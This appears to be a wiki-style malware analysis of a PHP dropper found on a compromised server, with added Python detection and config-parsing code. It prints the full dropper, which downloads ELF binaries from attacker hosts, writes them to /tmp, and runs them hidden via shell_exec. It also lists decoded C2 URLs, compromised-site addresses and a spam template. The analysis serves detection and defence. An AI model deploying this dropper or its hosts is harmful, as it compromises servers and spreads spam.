PHP Shell Exploit

From Leo's Notes
Last edited on 15 June 2020, at 00:20.
<?php
// Substitution alphabet handed to every helper below. Nothing in the code
// shown reads it; it is presumably consumed by the bot's base64+xor routine.
$key="1)#'ps3!U P|m[A\tyr4j6?F\nZ^C98Nng\$\\%{}wY:_Vx`e7LcGWoO\rhK>a;q0HD.&QRz~@,TM-l(5JSitk/]2bu=d\"I<BEXfv*+";

// Second-stage ELF payloads, one per architecture.
$crondElf32 ='http://pages.touchpadz.com/crond32';
$crondElf64 ='http://pages.touchpadz.com/crond64';
// Encoded bot configuration, passed to the payload through its environment
// (the value is elided on this page).
$xdvsnExploitEnv = 'XDVSN_SESSION_COOKIE=...';
$systemType = php_uname('s');   // kernel name, e.g. "Linux"
$xpsvt57 = php_uname('m');      // machine type; set but never used below

echo '<shchzzz>';
// Single-iteration loop: "break" is used as an early exit to the closing tag.
for (;;) {
	if (!function_exists('shell_exec')) {
		echo '<err step=1 err=noshex data=>';
		break;
	}
	if ($systemType !== 'Linux') {
		// The listing had an undefined $hafev1 here, presumably the obfuscated
		// name for $systemType that was not renamed along with the others.
		echo '<err step=2 err=nolinux data='.$systemType.'>';
		break;
	}
	$targetFilename = 'crond';
	$exploitUrl = "";

	// Pointer-width probe: ~0 is 64 bits wide on a 64-bit PHP build.
	if (strlen(decbin(~0)) == 64) {
		echo '<inf step=3 data=x64>';
		$exploitUrl = $crondElf64;
	} else {
		echo '<inf step=3 data=x32>';
		$exploitUrl = $crondElf32;
	}

	$exploitFilename = "";
	if (!file_exists($targetFilename)) {
		$exploitFilename = saveUrlToFile($key, $exploitUrl, $targetFilename);

		if ( $exploitFilename == FALSE) {
			echo '<err step=4 err=downl data=>';
			break;
		} else {
			echo '<inf step=4 data=downok>';
		}
	} else {
		echo '<inf step=4 data=exists>';
	}

	chmod($exploitFilename, 0755);

	$exploitCmd = $xdvsnExploitEnv.' ./'.$exploitFilename.' >/dev/null 2>/dev/null &';
	$exploitResult = shell_exec($exploitCmd);

	echo '<inf step=5 data=done data2='.$exploitResult.'>';
	sleep(1);

	unlink($exploitFilename);

	break;
}

echo '</shchzzz>';
exit();


// Fetch $url with fopen() (needs allow_url_fopen) and fall back to cURL.
function getPasteFileContents($key, $url) {
	$hackFileContents = "";
	$fp = @fopen($url, 'rb');

	if ($fp == FALSE) {
		if (!function_exists('curl_init'))
			return FALSE;

		$curl = @curl_init();
		@curl_setopt($curl, CURLOPT_URL, $url);
		@curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
		$hackFileContents = @curl_exec($curl);
		@curl_close($curl);
	} else {
		while(!feof($fp))
			$hackFileContents.= fread($fp, 1024 * 64);
		fclose($fp);
	}
	return $hackFileContents;
}

function saveContentsToFile($key, $hackFilename, $hackFileContents) {
	$fp = fopen($hackFilename, 'wb+');

	if ($fp == FALSE) {
		if (!function_exists('file_put_contents')) return FALSE;
		if ( @file_put_contents($hackFilename, $hackFileContents) === FALSE ) return FALSE;
	} else {
		$blbem39 = fwrite($fp, $hackFileContents, strlen($hackFileContents));
		fclose($fp);
		if ($blbem39 == FALSE || $blbem39 != strlen($hackFileContents)) return FALSE;
	}
	return TRUE;
}

// Download $url and try the script's own directory first, then /tmp.
// Returns the path actually written, or FALSE.
function saveUrlToFile($key, $url, $exploitFilename) {
	$hackFileContents = getPasteFileContents($key, $url);

	if ($hackFileContents == FALSE) return FALSE;

	// The listing had an empty operand before .'/' on both lines below (a
	// syntax error); the current directory './' is assumed here.
	if (saveContentsToFile($key, './'.$exploitFilename, $hackFileContents) == FALSE) {
		if (saveContentsToFile($key, '/tmp/'.$exploitFilename, $hackFileContents) == FALSE) {
			return FALSE;
		} else {
			return '/tmp/'.$exploitFilename;
		}
	} else {
		return './'.$exploitFilename;
	}
	return FALSE;
}


On a successful run the attacker sees output like this:

<shchzzz>
<inf step=3 data=x64>
<inf step=4 data=downok>
<inf step=5 data=done data2=XXX>
</shchzzz>

where XXX is whatever shell_exec() returned. Since shell_exec() returns the command's standard output rather than its exit status, and that output is redirected to /dev/null with the process backgrounded, data2 is normally empty. The command attempted is:

XDVSN_SESSION_COOKIE=... ./tmp/crond >/dev/null 2>/dev/null &

Note that the './' prefix joined to the /tmp/crond fallback path gives .//tmp/crond, which the shell resolves relative to the web server's working directory, not to /tmp.


The XDVSN_SESSION_COOKIE environment variable carries the bot's configuration (server URLs and session identifiers), encoded with the same base64+xor scheme the malware uses elsewhere. If the variable is missing, the binary terminates immediately.
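To hunt for other copies of this dropper on a compromised host, the following Python script (an added example, not code from the page or from the malware) walks a web root and scores PHP files on the behaviours seen above (remote fetch, write under /tmp, chmod 0755, backgrounded shell_exec with an environment prefix, self-deletion) together with the fixed indicators from this sample (XDVSN_SESSION_COOKIE, touchpadz.com, the <shchzzz> marker, crond32/crond64). The two embedded inputs are constructed: one is an excerpt of the listing above, the other a benign script that uses file_get_contents and file_put_contents.

```python
"""Triage scanner for the crond dropper pattern shown above (added example)."""
import os
import re
import sys
from dataclasses import dataclass, field

# Behaviours that together characterise the dropper; each one seen adds 1.
BEHAVIOUR_PATTERNS = {
    "fetch_remote": re.compile(r"\b(?:curl_exec|fopen|file_get_contents)\s*\("),
    "exec": re.compile(r"\b(?:shell_exec|exec|system|passthru|popen|proc_open)\s*\("),
    "chmod_exec": re.compile(r"\bchmod\s*\([^)]*0?7[0-7][0-7]\s*\)"),
    "tmp_drop": re.compile(r"['\"]/tmp/"),
    "background_exec": re.compile(r">\s*/dev/null[^'\"]*&"),
    "arch_probe": re.compile(r"decbin\s*\(\s*~0\s*\)|php_uname\s*\("),
    "self_delete": re.compile(r"\bunlink\s*\("),
}

# Fixed strings taken from this sample; any one of them is decisive on its own.
IOC_PATTERNS = {
    "env_var": re.compile(r"XDVSN_SESSION_COOKIE"),
    "c2_domain": re.compile(r"[\w.-]*touchpadz\.com"),
    "output_marker": re.compile(r"<shchzzz>"),
    "payload_name": re.compile(r"\bcrond(?:32|64)\b"),
}
URL_RE = re.compile(r"https?://[\w.-]+(?:/[^\s'\"<>]*)?")


@dataclass
class Finding:
    path: str
    behaviours: list = field(default_factory=list)
    iocs: dict = field(default_factory=dict)
    urls: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return 10 * len(self.iocs) + len(self.behaviours)

    @property
    def suspicious(self) -> bool:
        # A known IOC is enough; otherwise demand most of the behaviour chain.
        return bool(self.iocs) or len(self.behaviours) >= 4


def scan_source(path: str, source: str) -> Finding:
    """Score one PHP source text and collect its indicators."""
    f = Finding(path)
    for name, rx in BEHAVIOUR_PATTERNS.items():
        if rx.search(source):
            f.behaviours.append(name)
    for name, rx in IOC_PATTERNS.items():
        hits = sorted(set(rx.findall(source)))
        if hits:
            f.iocs[name] = hits
    f.urls = sorted(set(URL_RE.findall(source)))
    return f


def scan_tree(root: str, exts=(".php", ".phtml", ".php5", ".inc")) -> list:
    """Walk a web root and return suspicious findings, highest score first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            p = os.path.join(dirpath, name)
            try:
                with open(p, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            f = scan_source(p, src)
            if f.suspicious:
                findings.append(f)
    return sorted(findings, key=lambda f: -f.score)


# Constructed excerpt of the dropper's key lines (from the listing above).
DROPPER_SAMPLE = r"""<?php
$crondElf64 ='http://pages.touchpadz.com/crond64';
$xdvsnExploitEnv = 'XDVSN_SESSION_COOKIE=...';
echo '<shchzzz>';
if (strlen(decbin(~0)) == 64) { $exploitUrl = $crondElf64; }
$curl = @curl_init(); $hackFileContents = @curl_exec($curl);
$fp = fopen('/tmp/'.$exploitFilename, 'wb+');
chmod($exploitFilename, 0755);
$exploitResult = shell_exec($xdvsnExploitEnv.' ./'.$exploitFilename.' >/dev/null 2>/dev/null &');
unlink($exploitFilename);
"""

# Constructed benign script that innocently uses one of the same functions.
BENIGN_SAMPLE = r"""<?php
$data = file_get_contents('https://example.org/feed.json');
file_put_contents('/var/www/cache/feed.json', $data);
echo 'updated';
"""


def main(argv):
    root = argv[1] if len(argv) > 1 else "."
    for f in scan_tree(root):
        print(f"{f.score:3d}  {f.path}")
        print("     behaviours:", ", ".join(f.behaviours))
        for name, hits in f.iocs.items():
            print(f"     ioc {name}:", ", ".join(hits))
        for url in f.urls:
            print("     url:", url)


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 scan.py /var/www` and block the extracted URLs at the egress proxy; the behaviour score alone is meant to catch re-obfuscated variants of the same dropper that no longer contain the fixed strings.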

The decoded value of the environment variable:

<ps>10</ps><urh></urh><urp></urp><lt>500</lt><lc>100</lc><bs>20</bs><lu>http://sk.touchpadz.com/</lu><bu>http://bat.touchpadz.com/aa2.php</bu><su>http://stat.touchpadz.com/gj13.php</su><ldb>wb_001</ldb><kk>38b104796d9d02a8,5f19dd761b1ae067,182d9be35a58b5e,761257c7ae43552,1c691b2c387735ec,1a75779015fcde28,c5d6105468cd740,488810955cf90d0c,62c800293882f80f,1e6bff6b444e1b0d,63d257290658b998,2b00ef0f4a4f197d,f12c54e1957cd43,5365385a1a570922,4818e6565aba7eba,9d655855688d574,317620b4425d6470,16d58c031dde7a1,5f925640005cf66b,57362ca225acae0f,6bd7afc11d5420dd,7e39dddb0914d741,374032b557c1670f,5a5578712156b2b2,42ee16dd1d1f6b25,79b39ab87e732619,39cab5d02b66c9fa,695693fe330e805f,7d0e38ce30b3de2c,70bf755429b05946,78b559b14a13f306,63b8768e636fd96d,442bf7c122970484,68a9c97f62ec282d,7e4216bd24e354b3,48ce08564e85ad17,2a272aed717384df,5718c84f1c0728db,1a0b91e36d971d16,5bf70935377de764,2ae2b45809ae550d,14520f18175d3cba,6a3e24f715ed4c45,e2a92e80d130642,5c001f680c0e55ae,11b5a572ac847f8,42ed425f66a0cef2,4772e82748e7bebc,669b8fae6ef65ec8,70c9170722074810,c0c658a01de8eda,3a74ccd14a330cf8,5d98d57c5ce8318b,100d0dfa4910e1f7,736386400b035095,69fad7f5d37b1e4,73806131716d54da,40de30093b2401ca,38f1d4c10cc729c2,6786c7c141a4c6a6,28ee1f9b295d4fc1,2d1f5ec46686eea6,249e4a86142ef7d8,1791d1e8666c2414,45b5133a7301aa3c</kk>

The binary fetches data from three URLs taken from this configuration:

  1. lu: hxxp://sk.touchpadz.com/ + /img/logo.gif?sessd=$ldb&sessc=$lc&sessk=$kk
  2. bu: hxxp://bat.touchpadz.com/aa2.php
  3. su: hxxp://stat.touchpadz.com/gj13.php

The lu URL carries three parameters taken from the environment variable (ldb, lc and kk). The data it returns is in an unknown encoding, but is most likely the list of recipient email addresses.

The bu URL returns the spam message template, again base64+xor encoded. Decoded, it looks like this:

<USER>lula_burton</USER>
<NAME>"Lula Burton"</NAME>
<SUBJ>Fw:  Hairy pussy girl undress panties</SUBJ>
<SBODY>
<div>
<p><a href="http://www.appgott.com/wp-content/plugins/better-wp-security/modules/free/backup/js/help.php?%MAIL_EN%">Hairy pussy girl undress panties</a></p>
combat,  why  none of us would be here. Thanks guys. Mission  complete
</div>
</SBODY>

The su URL returns the URL of a compromised site hosting the PHP spammer, for example:

http://resiliententrepreneur.com/wp-content/cache/supercache/resiliententrepreneur.com/ajaxfilemanager/file.php
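The decoded configuration and the template returned by the bu URL share one trivial format: a flat sequence of <tag>value</tag> pairs. The following Python code (an added example, not from the page or the malware) parses both, splits the kk key list, builds the lu beacon request described above (/img/logo.gif?sessd=$ldb&sessc=$lc&sessk=$kk) and pulls the tracking link out of the template. Two details are not shown on the page and are assumed here: that the kk list is joined with commas into sessk, and that %MAIL_EN% is filled with a base64url-encoded recipient address. The embedded configuration is an abbreviated copy of the decoded value above (three of the kk entries), and the template is a constructed one with the same tags and the same link.

```python
"""Parser for the bot's tag-delimited config and spam template (added example)."""
import base64
import re
from urllib.parse import urlencode, urljoin

TAG_RE = re.compile(r"<([A-Za-z_]+)>(.*?)</\1>", re.S)
HREF_RE = re.compile(r'href="([^"]+)"')


def parse_tags(blob: str) -> dict:
    """Flat <tag>value</tag> sequence -> dict. Markup nested inside a value
    (the <div>/<p>/<a> inside SBODY) is kept verbatim as that value."""
    return {m.group(1): m.group(2) for m in TAG_RE.finditer(blob)}


def parse_config(decoded: str) -> dict:
    """Decoded XDVSN_SESSION_COOKIE -> dict with kk split and counters as ints."""
    cfg = parse_tags(decoded)
    cfg["kk"] = [k for k in cfg.get("kk", "").split(",") if k]
    for num in ("ps", "lt", "lc", "bs"):
        if num in cfg:
            cfg[num] = int(cfg[num])
    return cfg


def beacon_url(cfg: dict) -> str:
    """The lu request: <lu>/img/logo.gif?sessd=$ldb&sessc=$lc&sessk=$kk.
    Comma-joining kk is an assumption; the page only names the parameters."""
    query = urlencode(
        {"sessd": cfg["ldb"], "sessc": cfg["lc"], "sessk": ",".join(cfg["kk"])},
        safe=",",
    )
    return urljoin(cfg["lu"], "img/logo.gif") + "?" + query


def parse_template(decoded: str) -> dict:
    """Decoded bu payload -> dict of USER/NAME/SUBJ/SBODY plus the hrefs found."""
    msg = parse_tags(decoded)
    msg["links"] = HREF_RE.findall(msg.get("SBODY", ""))
    return msg


def personalize(msg: dict, recipient: str) -> str:
    """Fill %MAIL_EN% for one recipient. base64url without padding is an
    assumed encoding; the real one is not shown on the page."""
    token = base64.urlsafe_b64encode(recipient.encode()).decode().rstrip("=")
    return msg["SBODY"].replace("%MAIL_EN%", token)


def decode_recipient(token: str) -> str:
    """Inverse of the encoding assumed in personalize()."""
    return base64.urlsafe_b64decode(token + "=" * (-len(token) % 4)).decode()


# Abbreviated copy of the decoded configuration shown above (3 of the kk keys).
CONFIG_SAMPLE = (
    "<ps>10</ps><urh></urh><urp></urp><lt>500</lt><lc>100</lc><bs>20</bs>"
    "<lu>http://sk.touchpadz.com/</lu><bu>http://bat.touchpadz.com/aa2.php</bu>"
    "<su>http://stat.touchpadz.com/gj13.php</su><ldb>wb_001</ldb>"
    "<kk>38b104796d9d02a8,5f19dd761b1ae067,182d9be35a58b5e</kk>"
)

# Constructed template with the same tags and link as the decoded bu payload.
TEMPLATE_SAMPLE = """<USER>lula_burton</USER>
<NAME>"Lula Burton"</NAME>
<SUBJ>Fw:  hello</SUBJ>
<SBODY>
<div>
<p><a href="http://www.appgott.com/wp-content/plugins/better-wp-security/modules/free/backup/js/help.php?%MAIL_EN%">hello</a></p>
</div>
</SBODY>"""


if __name__ == "__main__":
    cfg = parse_config(CONFIG_SAMPLE)
    print("beacon:", beacon_url(cfg))
    msg = parse_template(TEMPLATE_SAMPLE)
    print("from:", msg["NAME"], "links:", msg["links"])
    print(personalize(msg, "alice@example.org"))
```

The beacon URL and the link hosts extracted this way are the network indicators worth alerting on: the former identifies the bot checking in, the latter the compromised sites carrying the redirector.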


Email Links

Each spam message contains what appear to be random explicit words (or simply very bad English) and a single link hosted on a compromised server.

The visitor is redirected to the real destination only if the URI carries an encoded email address (the %MAIL_EN% placeholder in the template above). That destination appears to be run by, or affiliated with, the botnet operator, since its page loads an image from:

  • hxxp://touch.touchpadz.com/empty22.gif